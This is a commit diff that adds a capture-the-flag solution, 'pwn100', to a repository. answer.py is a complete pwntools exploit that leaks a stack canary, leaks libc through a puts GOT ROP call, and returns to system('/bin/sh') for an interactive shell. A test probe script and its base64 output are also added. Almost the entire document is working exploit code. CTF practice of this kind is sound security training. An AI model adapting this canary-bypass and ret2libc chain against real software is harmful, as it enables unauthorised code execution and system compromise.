Finished canary/pwn100

canary/pwn100/answer.py

@@ -0,0 +1,52 @@
+#!/usr/bin/env python2
+from pwn import *
+from LibcSearcher import *
+from struct import pack
+import os, base64
+context(arch = "i386",os = "linux", log_level = "debug")
+
+p = process('./pwns')
+elf = ELF('./pwns')
+
+# Canary Leak
+p.recvuntil("May be I can know if you give me some data[Y/N]\n")
+confirm = "Y"
+p.sendline(confirm)
+p.recvuntil("Give me some datas:\n\n")
+
+canary_payload = 257*'0' + '0'
+canary_payload = base64.b64encode(canary_payload)
+p.sendline(canary_payload)
+p.recv(0x10b)
+canary_value = u32(p.recv(4)) - 0x30
+print("Canary: " + hex(canary_value))
+
+# puts .got address leak
+p.recvuntil("May be I can know if you give me some data[Y/N]\n")
+p.sendline(confirm)
+p.recvuntil("Give me some datas:\n\n")
+
+puts_plt = elf.plt['puts']
+puts_got = elf.got['puts']
+b64decode_func = 0x080487e6
+puts_leak_payload = 257*'\x00' + p32(canary_value) + 8*'0' + p32(0) + p32(puts_plt) + p32(b64decode_func) + p32(puts_got)
+puts_leak_payload = base64.b64encode(puts_leak_payload)
+p.sendline(puts_leak_payload)
+
+p.recvuntil("Result is:\n")
+puts_libc = u32(p.recv(4))
+
+# Query LibcSearcher
+libc = LibcSearcher('puts', puts_libc)
+libc_base = puts_libc - libc.dump('puts')
+system_libc = libc_base + libc.dump('system')
+binsh_libc = libc_base + libc.dump('str_bin_sh')
+
+# ROP to Shell
+retn_addr = 0x08048c27
+p.recvuntil("Give me some datas:\n\n")
+shell_payload = 257*'\x00' + p32(canary_value) + 8*'0' + p32(0) + p32(system_libc) + p32(b64decode_func) + p32(binsh_libc)
+shell_payload = base64.b64encode(shell_payload)
+p.sendline(shell_payload)
+
+p.interactive()

canary/pwn100/test.py

@@ -0,0 +1,29 @@
+#!/usr/bin/env python2
+from pwn import *
+from LibcSearcher import *
+from struct import pack
+import os, base64
+context(arch = "i386",os = "linux", log_level = "debug")
+
+
+p = process('./pwns')
+elf = ELF('./pwns')
+
+p.recvuntil("May be I can know if you give me some data[Y/N]")
+confirm = "Y"
+p.sendline(confirm)
+
+test_payload = ""
+for i in range(256):
+    test_payload += chr(i)
+for i in range(256):
+    test_payload += chr(i)
+test_payload = base64.b64encode(test_payload)
+
+p.sendline(test_payload)
+
+with open("test.txt", "w") as f:
+    f.write(confirm + "\n")
+    f.write(test_payload + "\n")
+
+p.interactive()

canary/pwn100/test.txt

@@ -0,0 +1,2 @@
+Y
+AAECAwQFBgcICQoLDA0ODxAREhMUFRYXGBkaGxwdHh8gISIjJCUmJygpKissLS4vMDEyMzQ1Njc4OTo7PD0+P0BBQkNERUZHSElKS0xNTk9QUVJTVFVWV1hZWltcXV5fYGFiY2RlZmdoaWprbG1ub3BxcnN0dXZ3eHl6e3x9fn+AgYKDhIWGh4iJiouMjY6PkJGSk5SVlpeYmZqbnJ2en6ChoqOkpaanqKmqq6ytrq+wsbKztLW2t7i5uru8vb6/wMHCw8TFxsfIycrLzM3Oz9DR0tPU1dbX2Nna29zd3t/g4eLj5OXm5+jp6uvs7e7v8PHy8/T19vf4+fr7/P3+/wABAgMEBQYHCAkKCwwNDg8QERITFBUWFxgZGhscHR4fICEiIyQlJicoKSorLC0uLzAxMjM0NTY3ODk6Ozw9Pj9AQUJDREVGR0hJSktMTU5PUFFSU1RVVldYWVpbXF1eX2BhYmNkZWZnaGlqa2xtbm9wcXJzdHV2d3h5ent8fX5/gIGCg4SFhoeIiYqLjI2Oj5CRkpOUlZaXmJmam5ydnp+goaKjpKWmp6ipqqusra6vsLGys7S1tre4ubq7vL2+v8DBwsPExcbHyMnKy8zNzs/Q0dLT1NXW19jZ2tvc3d7f4OHi4+Tl5ufo6err7O3u7/Dx8vP09fb3+Pn6+/z9/v8=